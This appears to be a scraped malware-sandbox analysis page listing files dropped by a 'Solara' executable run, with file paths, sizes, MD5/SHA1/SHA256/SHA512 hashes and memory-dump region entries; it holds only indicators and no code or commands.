ee185a1ff257c86eb19d30a191bf0695d5ac72a1

SHA256
5e7faee6b8230ca3b97ce9542b914db3abbbd1cb14fd95a39497aaad4c1094ca

SHA512
cf5c70984cf33e12cf57116da1f282a5bd6433c570831c185253d13463b0b9a0b9387d4d1bf4dddab3292a5d9ba96d66b6812e9d7ebc5eb35cb96eea2741348f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Microsoft.Web.WebView2.WinForms.dll

Filesize
37KB

MD5
4cf94ffa50fd9bdc0bb93cceaede0629

SHA1
3e30eca720f4c2a708ec53fd7f1ba9e778b4f95f

SHA256
50b2e46c99076f6fa9c33e0a98f0fe3a2809a7c647bb509066e58f4c7685d7e6

SHA512
dc400518ef2f68920d90f1ce66fbb8f4dde2294e0efeecd3d9329aa7a66e1ab53487b120e13e15f227ea51784f90208c72d7fbfa9330d9b71dd9a1a727d11f98

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Microsoft.Web.WebView2.Wpf.dll

Filesize
43KB

MD5
34ec990ed346ec6a4f14841b12280c20

SHA1
6587164274a1ae7f47bdb9d71d066b83241576f0

SHA256
1e987b22cd011e4396a0805c73539586b67df172df75e3dded16a77d31850409

SHA512
b565015ca4b11b79ecbc8127f1fd40c986948050f1caefdd371d34ed2136af0aabf100863dc6fd16d67e3751d44ee13835ea9bf981ac0238165749c4987d1ae0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Newtonsoft.Json.dll

Filesize
695KB

MD5
195ffb7167db3219b217c4fd439eedd6

SHA1
1e76e6099570ede620b76ed47cf8d03a936d49f8

SHA256
e1e27af7b07eeedf5ce71a9255f0422816a6fc5849a483c6714e1b472044fa9d

SHA512
56eb7f070929b239642dab729537dde2c2287bdb852ad9e80b5358c74b14bc2b2dded910d0e3b6304ea27eb587e5f19db0a92e1cbae6a70fb20b4ef05057e4ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\VCRUNTIME140.dll

Filesize
99KB

MD5
7a2b8cfcd543f6e4ebca43162b67d610

SHA1
c1c45a326249bf0ccd2be2fbd412f1a62fb67024

SHA256
7d7ca28235fba5603a7f40514a552ac7efaa67a5d5792bb06273916aa8565c5f

SHA512
e38304fb9c5af855c1134f542adf72cde159fab64385533eafa5bb6e374f19b5a29c0cb5516fc5da5c0b5ac47c2f6420792e0ac8ddff11e749832a7b7f3eb5c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\WebView2Loader.dll

Filesize
133KB

MD5
a0bd0d1a66e7c7f1d97aedecdafb933f

SHA1
dd109ac34beb8289030e4ec0a026297b793f64a3

SHA256
79d7e45f8631e8d2541d01bfb5a49a3a090be72b3d465389a2d684680fee2e36

SHA512
2a50ae5c7234a44b29f82ebc2e3cfed37bf69294eb00b2dc8905c61259975b2f3a059c67aeab862f002752454d195f7191d9b82b056f6ef22d6e1b0bb3673d50

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Wpf.Ui.dll

Filesize
5.2MB

MD5
aead90ab96e2853f59be27c4ec1e4853

SHA1
43cdedde26488d3209e17efff9a51e1f944eb35f

SHA256
46cfbe804b29c500ebc0b39372e64c4c8b4f7a8e9b220b5f26a9adf42fcb2aed

SHA512
f5044f2ee63906287460b9adabfcf3c93c60b51c86549e33474c4d7f81c4f86cd03cd611df94de31804c53006977874b8deb67c4bf9ea1c2b70c459b3a44b38d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\bin\path.txt

Filesize
34B

MD5
0e2184f1c7464b6617329fb18f107b4f

SHA1
6f22f98471e33c9db10d6f6f1728e98852e25b8f

SHA256
dbf5f44e1b84a298dbbcad3c31a617d2f6cfa08eb5d16e05a5c28726c574d4eb

SHA512
8e745c0215d52e15702551f29efb882a5eba97b5f279ccc29293b1a9b1b8661bf71b548569f9a99fa35c35a15d1b6b288d3c381c1292418c36dc89e2fa0b3a37

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.dll

Filesize
4.4MB

MD5
d2707360ae563a7a10e27beba85a6cd9

SHA1
686e830b839fc63a65fdebe78aa90edd687e9257

SHA256
f69022372a947acb86bae76f312ab518c1eb5df954339a46c4be71b4a8f73557

SHA512
e9f2a99869936f64e427ad081059e35283bd40f2b0d85bffc23d4ce35277778d8bfe98057e077e62955b0299c3182d173cb91a3d96a3b5690e7de61d01a1e000

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe

Filesize
90KB

MD5
d84e7f79f4f0d7074802d2d6e6f3579e

SHA1
494937256229ef022ff05855c3d410ac3e7df721

SHA256
dcfc2b4fa3185df415855ec54395d9c36612f68100d046d8c69659da01f7d227

SHA512
ed7b0ac098c8184b611b83158eaa86619001e74dba079d398b34ac694ce404ba133c2baf43051840132d6a3a089a375550072543b9fab2549d57320d13502260

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\libcurl.dll

Filesize
522KB

MD5
e31f5136d91bad0fcbce053aac798a30

SHA1
ee785d2546aec4803bcae08cdebfd5d168c42337

SHA256
ee94e2201870536522047e6d7fe7b903a63cd2e13e20c8fffc86d0e95361e671

SHA512
a1543eb1d10d25efb44f9eaa0673c82bfac5173055d04c0f3be4792984635a7c774df57a8e289f840627754a4e595b855d299070d469e0f1e637c3f35274abe6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\zlib1.dll

Filesize
113KB

MD5
75365924730b0b2c1a6ee9028ef07685

SHA1
a10687c37deb2ce5422140b541a64ac15534250f

SHA256
945e7f5d09938b7769a4e68f4ef01406e5af9f40db952cba05ddb3431dd1911b

SHA512
c1e31c18903e657203ae847c9af601b1eb38efa95cb5fa7c1b75f84a2cba9023d08f1315c9bb2d59b53256dfdb3bac89930252138475491b21749471adc129a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.exe

Filesize
38KB

MD5
f9f197df603432ac532aaec3c6098f53

SHA1
0a1458fcff3a09cead09bcc9e7cb5599386df33c

SHA256
a68a1c0d65b3c7e38fc5831f9433b49b3e915c79a0ceb9aea8e966f2673f3bac

SHA512
4ee4e80275362fe69ff0f0fecbc66d07c18d4d9df0b14528d7f509c3f7ce402370ebd6bd2d9d1174b077c8f9aef7a84b95c5fa999438daa38685d31ebb20667d

Download Submit
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

Filesize
13KB

MD5
6557bd5240397f026e675afb78544a26

SHA1
839e683bf68703d373b6eac246f19386bb181713

SHA256
a7fecfc225dfdd4e14dcd4d1b4ba1b9f8e4d1984f1cdd8cda3a9987e5d53c239

SHA512
f2399d34898a4c0c201372d2dd084ee66a66a1c3eae949e568421fe7edada697468ef81f4fcab2afd61eaf97bcb98d6ade2d97295e2f674e93116d142e892e97

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hrpotdtf.fje.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpDE5A.tmp.bat

Filesize
184B

MD5
ddb5745519e4cd9aa2f9053898cad0e8

SHA1
3284efeb0ba66d1c7ec1c964429d0900a5978d3d

SHA256
5026e38e5ae468ed4a30f9e373546f1bde0f1e2d35254e3b998c5b4978535772

SHA512
ecb71c319c957cf63c839a46eae6b7b07273f37014f0e1abb8d746dfcac3543215ed0c1ed1013376f57416a1cf30278ed6001a7ed1c2661136f30fa7a06e1b94

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 940697.crdownload

Filesize
60KB

MD5
1cfcc5c157c691a2b9ffd50fec913093

SHA1
61704466c94b08536b6904ecc782fa6fcfdd509d

SHA256
1dc198e86283098efac61b253ca64079b0c696fc42e56eab20ad748c3a2517c3

SHA512
0f520e3b2a7f9ede20a93a5086ca89299fd0ef140810bb046b07e7f15143d9ec43c5e2f733e7741f1ce0479fb5a3229b7480e4e40372e5ae6b0c3eebe9bf2ffe

Download Submit
memory/1208-667-0x0000000007E20000-0x0000000007EB6000-memory.dmp

Filesize
600KB

Download
memory/1208-681-0x0000000007EC0000-0x0000000007EDA000-memory.dmp

Filesize
104KB

Download
memory/1208-630-0x0000000007B90000-0x0000000007BAA000-memory.dmp

Filesize
104KB

Download
memory/1208-219-0x0000000006040000-0x00000000060A6000-memory.dmp

Filesize
408KB

Download
memory/1208-669-0x0000000007D90000-0x0000000007DA1000-memory.dmp

Filesize
68KB

Download
memory/1208-629-0x00000000081D0000-0x000000000884A000-memory.dmp

Filesize
6.5MB

Download
memory/1208-230-0x0000000006360000-0x00000000066B4000-memory.dmp

Filesize
3.3MB

Download
memory/1208-211-0x0000000005270000-0x00000000052A6000-memory.dmp

Filesize
216KB

Download
memory/1208-679-0x0000000007DD0000-0x0000000007DDE000-memory.dmp

Filesize
56KB

Download
memory/1208-377-0x0000000007A60000-0x0000000007B03000-memory.dmp

Filesize
652KB

Download
memory/1208-212-0x00000000058E0000-0x0000000005F08000-memory.dmp

Filesize
6.2MB

Download
memory/1208-323-0x0000000007A30000-0x0000000007A4E000-memory.dmp

Filesize
120KB

Download
memory/1208-680-0x0000000007DE0000-0x0000000007DF4000-memory.dmp

Filesize
80KB

Download
memory/1208-220-0x00000000060B0000-0x0000000006116000-memory.dmp

Filesize
408KB

Download
memory/1208-682-0x0000000007E10000-0x0000000007E18000-memory.dmp

Filesize
32KB

Download
memory/1208-232-0x0000000006860000-0x000000000687E000-memory.dmp

Filesize
120KB

Download
memory/1208-297-0x0000000070040000-0x000000007008C000-memory.dmp

Filesize
304KB

Download
memory/1208-214-0x0000000005850000-0x0000000005872000-memory.dmp

Filesize
136KB

Download
memory/1208-272-0x0000000006E40000-0x0000000006E72000-memory.dmp

Filesize
200KB

Download
memory/1208-655-0x0000000007C00000-0x0000000007C0A000-memory.dmp

Filesize
40KB

Download
memory/1208-233-0x0000000006890000-0x00000000068DC000-memory.dmp

Filesize
304KB

Download
memory/4104-235-0x0000000006380000-0x0000000006392000-memory.dmp

Filesize
72KB

Download
memory/4104-213-0x0000000005880000-0x000000000588A000-memory.dmp

Filesize
40KB

Download
memory/4104-210-0x0000000000FF0000-0x0000000000FFA000-memory.dmp

Filesize
40KB

Download
memory/4624-208-0x0000000000030000-0x000000000003E000-memory.dmp

Filesize
56KB

Download
memory/5600-693-0x000001F6E1D50000-0x000001F6E1DCE000-memory.dmp

Filesize
504KB

Download
memory/5600-687-0x000001F6E1400000-0x000001F6E140E000-memory.dmp

Filesize
56KB

Download
memory/5600-685-0x000001F6E1430000-0x000001F6E1452000-memory.dmp

Filesize
136KB

Download
memory/5600-730-0x0000000180000000-0x0000000180B57000-memory.dmp

Filesize
11.3MB

Download
memory/5600-677-0x000001F6E1200000-0x000001F6E12B2000-memory.dmp

Filesize
712KB

Download
memory/5600-672-0x000001F6E1140000-0x000001F6E11FA000-memory.dmp

Filesize
744KB

Download
memory/5600-734-0x000001F6E1D00000-0x000001F6E1D08000-memory.dmp

Filesize
32KB

Download
memory/5600-736-0x000001F6E6260000-0x000001F6E626E000-memory.dmp

Filesize
56KB

Download
memory/5600-735-0x000001F6E62A0000-0x000001F6E62D8000-memory.dmp

Filesize
224KB

Download
memory/5600-671-0x000001F6E1490000-0x000001F6E19CC000-memory.dmp

Filesize
5.2MB

Download
memory/5600-668-0x000001F6C69F0000-0x000001F6C6A0A000-memory.dmp

Filesize
104KB

Download
memory/5600-755-0x0000000180000000-0x0000000180B57000-memory.dmp

Filesize
11.3MB

Download